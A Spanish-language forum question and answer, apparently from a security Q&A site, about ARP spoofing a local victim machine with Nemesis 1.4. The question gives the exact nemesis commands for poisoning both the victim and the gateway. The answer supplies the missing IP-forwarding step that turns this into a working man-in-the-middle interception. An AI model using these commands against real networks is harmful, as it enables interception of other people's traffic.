¿La conexión a Internet del sistema de víctimas es lenta después de la falsificación de ARP?

3

He estado usando Nemesis 1.4 para probar la falsificación de ARP en una máquina víctima local. He estado falsificando tanto la máquina víctima como la puerta de enlace predeterminada para redirigir ARP a mi máquina.

Fuente de la víctima falsa MAC:

sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
                 -h [my system MAC]  -m [gateway MAC] -H [my MAC] -M [gateway MAC]

Spoofing gateways MAC:

sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
                 -h [my system MAC]  -m [victim MAC] -H [my MAC] -M [victim MAC]

Luego, se realiza un BASH en bucle y comienza la redirección ARP, falsificando cada 10 segundos. En tcpdump puedo ver las respuestas de ARP que salen, y parece estar funcionando. Pero una vez en la máquina de las víctimas, la conexión a Internet de repente se vuelve dolorosamente lenta, si es que funciona. ¿Nemesis no está redirigiendo? Si es así, ¿qué estoy haciendo mal?

    
pregunta Dividan84 05.10.2012 - 04:06
fuente

1 respuesta

1

Al leer este artículo, parece que la némesis simplemente envenena el caché de arp de la víctima y la puerta de enlace para hacer que envíen paquetes a su máquina (el intermediario).

Debe habilitar el reenvío de IP (consulte el artículo anterior o este para más detalles sobre el reenvío de IP) en su máquina para que los paquetes redirigidos se reenvíen a los sistemas correctos.

    
respondido por el HeatfanJohn 05.10.2012 - 04:30
fuente

Lea otras preguntas en las etiquetas